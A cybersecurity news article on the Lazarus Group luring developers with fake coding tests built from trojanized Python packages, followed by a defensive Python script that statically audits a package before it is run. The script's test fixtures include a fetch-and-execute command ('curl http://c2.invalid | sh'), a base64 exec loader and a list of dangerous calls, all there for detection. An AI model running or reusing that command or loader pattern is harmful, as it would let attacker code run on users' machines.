Developers Targeted in Fake Coding Tests from the Lazarus Group
In a world where the lines between opportunity and danger blur, even job interviews can become cyberattack vectors. Recently, cybersecurity experts uncovered a new wave of malicious activity aimed at software developers, carried out by the infamous North Korean-backed Lazarus Group. This time, they’re using fake coding tests to trick developers into unknowingly installing malware. Let’s break down what’s happening and how you can protect yourself.
A New Kind of Cyber Threat: Fake Coding Assessments
If you are a developer who is active on GitHub, LinkedIn, npm or PyPI, pay extra attention to any coding test or job offer that comes your way. The Lazarus Group, a North Korean state-sponsored threat actor, has been using fake job interviews to lure developers into downloading trojanized Python packages. The activity is part of an ongoing campaign dubbed VMConnect, first documented in August 2023.
Here's how it works: a developer is approached with a "job opportunity" and asked to complete a coding challenge. Everything looks legitimate, but the project files the candidate is told to build and run contain the malware.
How They Operate and The Hidden Danger in Your Code
The Lazarus Group ships trojanized copies of legitimate Python packages such as pyperclip and pyrebase, so the project reads like ordinary open-source code. The malicious code lives in the package's __init__.py file and in the corresponding compiled Python file (PYC). Because __init__.py executes the moment the package is imported, simply building or running the test project is enough: the malware contacts a command-and-control (C2) server and executes whatever it is sent, with nothing visible to the user.
To make matters worse, the package arrives as a ZIP archive together with a deadline. One coding test, for instance, asked candidates to find and fix a flaw in the Python code within 15 minutes. The time pressure is the point: it pushes the candidate to run the project first and read it later, skipping the checks that would have exposed the malware.
Real Targets, Big Names, Big Risks
One of the more disturbing aspects of this campaign is that the Lazarus Group impersonates reputable financial institutions, Capital One and Rookery Capital Limited among them, to make the approach more convincing. After initial conversations on LinkedIn, developers receive a ZIP file containing malware disguised as a coding test. On macOS the payload has been identified as COVERTCATCH, a first-stage downloader that fetches a second-stage malware which establishes persistence on the system via Launch Agents and Launch Daemons.
It is unclear how many developers have been hit so far, but the method is becoming more common. A report from Mandiant, Google's incident-response firm, describes how these attacks typically start with an innocent-looking chat on LinkedIn and move on to the malware-laden coding test.
A Global Threat from the Lazarus Group’s Broader Campaigns
The Lazarus Group is not limiting itself to software developers. It has also been linked to spear-phishing attacks targeting Russia and South Korea. These attacks, codenamed CLOUD#REVERSER, deliver malware such as CURKON, a malicious Windows shortcut (LNK) file that downloads further payloads, and the group has used remote access trojans (RATs) such as AsyncRAT and Lilith RAT to control infected systems.
How Developers Can Stay Safe
- Be Skeptical of Job Offers: Especially when the approach comes through LinkedIn or another social network, verify the company and the recruiter independently. Contact the company through a channel you find yourself, not one the recruiter supplies, and remember that scammers routinely pose as recruiters from well-known firms.
- Always Review Code Before Running: However urgent the test seems, read the source first, and treat the deadline itself as a warning sign. Unpack the ZIP in a throwaway environment and look at __init__.py, setup.py and any .pyc file that has no matching .py before you build, install or test the project. Keep in mind that pytest collection and some IDE features import project code, which is enough to trigger a malicious __init__.py.
- Stay Informed About Threats: The techniques evolve constantly. Follow security news and the advisories from package registries such as PyPI and npm so you recognize the next variant.
- Use Security Tools and Isolation: Keep trusted anti-malware software running, but do not rely on it alone. Run take-home assignments inside a disposable VM or container that has no access to your SSH keys, cloud credentials, password manager or cryptocurrency wallets, so that a malicious package that does run cannot take anything worth stealing.
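The script below is the pre-execution check the advice above asks for and the "how they operate" section calls for. It is added here as an example and is not code from the article or from any of the reports it cites. It walks an unpacked "coding test" without importing anything, flags import-time calls such as exec(), base64.b64decode(), os.system() or socket.socket() in any .py file, and compares each .pyc header against the source it should have been compiled from; a .pyc with no source beside it is flagged outright, because Python imports such a file as-is. The suspicious-call list, the 64-character blob threshold and the two sample packages it builds in a temporary directory are constructed for the demo, not real VMConnect samples.

```python
"""Static triage of a Python package received as a 'coding test' (added example, not
code from the article or any vendor report). It inspects an unpacked package without
importing it: import-time calls that decode/execute payloads or reach the network, and
.pyc files that do not match the source beside them. Fixtures and thresholds are assumed."""
import ast, base64, importlib.util, os, py_compile, re, struct, tempfile

SUSPICIOUS_CALLS = {  # rarely on a library's import path (assumption; tune as needed)
    "exec", "eval", "compile", "base64.b64decode", "marshal.loads", "zlib.decompress",
    "subprocess.Popen", "subprocess.run", "os.system", "urllib.request.urlopen",
    "requests.get", "requests.post", "socket.socket",
}
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # 64+ chars: shorter is usually just text

def _call_name(node: ast.Call) -> str:
    parts, func = [], node.func                  # unwrap a.b.c(...) into 'a.b.c'
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    return ".".join(reversed(parts + [func.id])) if isinstance(func, ast.Name) else ""

def audit_source(path: str, text: str) -> list[str]:
    """Findings for one .py file, derived from its AST; the file is never executed."""
    try:
        tree = ast.parse(text, filename=path)
    except SyntaxError as exc:
        return [f"{path}: does not parse ({exc.msg}); do not run it blind"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in SUSPICIOUS_CALLS:
            findings.append(f"{path}:{node.lineno}: calls {_call_name(node)}()")
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and BASE64_RE.match(node.value)):
            findings.append(f"{path}:{node.lineno}: {len(node.value)}-char base64 blob")
    return findings

def audit_bytecode(pyc_path: str, source_path: str) -> list[str]:
    """Check a .pyc against its source. Since Python 3.7 the 16-byte header is magic,
    flags, then (mtime, source size) or, when flags bit 0 is set, an 8-byte source hash."""
    if not os.path.exists(source_path):  # sourceless .pyc: imported as-is, nothing to diff
        return [f"{pyc_path}: compiled bytecode with no matching source"]
    with open(pyc_path, "rb") as fh:
        head = fh.read(16)
    with open(source_path, "rb") as fh:
        src = fh.read()
    if len(head) < 16:
        return [f"{pyc_path}: truncated pyc header"]
    _magic, flags, _stamp, size = struct.unpack("<4sIII", head)
    if flags & 1 and head[8:16] != importlib.util.source_hash(src):
        return [f"{pyc_path}: source hash does not match {source_path}"]
    if not flags & 1 and size != len(src):
        return [f"{pyc_path}: built from a {size}-byte source, but {source_path} is {len(src)} bytes"]
    return []

def audit_package(root: str) -> list[str]:
    """Walk an unpacked package and collect findings from every .py and .pyc."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        # __pycache__/mod.cpython-312.pyc shadows ../mod.py; a bare mod.pyc shadows ./mod.py
        owner = os.path.dirname(dirpath) if os.path.basename(dirpath) == "__pycache__" else dirpath
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            if fname.endswith(".py"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(audit_source(full, fh.read()))
            elif fname.endswith(".pyc"):
                findings.extend(audit_bytecode(full, os.path.join(owner, fname.split(".")[0] + ".py")))
    return findings

def _write(path: str, text: str, compile_it: bool = False) -> None:
    with open(path, "w") as fh:
        fh.write(text)
    if compile_it:  # emits __pycache__/<stem>.cpython-3XX.pyc with a timestamp+size header
        py_compile.compile(path, doraise=True, invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP)

def build_samples(root: str) -> tuple[str, str]:
    """Construct a clean package and a trojanized one (fixtures, not real samples)."""
    clean, bad = os.path.join(root, "clean_pkg"), os.path.join(root, "bad_pkg")
    for d in (clean, bad):
        os.makedirs(d)
    benign = "def copy(text):\n    return text\n"
    _write(os.path.join(clean, "__init__.py"), benign, compile_it=True)
    # Trojanized __init__.py: a base64 blob decoded and exec'd at import time.
    blob = base64.b64encode(b"print('stage two would fetch from C2')" * 3).decode()
    _write(os.path.join(bad, "__init__.py"),
           f'import base64\nPAYLOAD = "{blob}"\nexec(base64.b64decode(PAYLOAD))\n', compile_it=True)
    # utils.py reads as harmless, but its cached bytecode was built from something else.
    _write(os.path.join(bad, "utils.py"), "import os\nos.system('curl http://c2.invalid | sh')\n", True)
    _write(os.path.join(bad, "utils.py"), benign)
    # Orphan bytecode with no .py beside it: Python imports it directly and never recompiles.
    with open(os.path.join(bad, "helper.pyc"), "wb") as fh:
        fh.write(importlib.util.MAGIC_NUMBER + b"\x00" * 12)
    return clean, bad

def run_demo() -> dict[str, list[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        clean, bad = build_samples(tmp)
        return {"clean": audit_package(clean), "bad": audit_package(bad)}

if __name__ == "__main__":
    for name, hits in run_demo().items():
        print(name, *hits, sep="\n  ")
```

Point audit_package() at the unpacked archive from inside your sandbox before you pip install it, run its tests or open it in an IDE. A hit on __init__.py, a .pyc with no source, or a .pyc whose header disagrees with its neighbour is reason to decompile and read before running anything. A clean result only means nothing obvious: a header match says the bytecode plausibly came from that source, and an attacker who pads a file to the expected size or ships a hash-based .pyc built from the planted source will pass this check, so the isolation advice above still applies.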
Vigilance is Key
The Lazarus Group's use of fake coding assessments to spread malware shows how creative state-backed threat actors have become. Developers, especially those eager to land their next job, are prime targets. A few extra precautions, reviewing the source code, verifying recruiters, isolating untrusted projects and staying current on security risks, go a long way toward protecting you and your systems.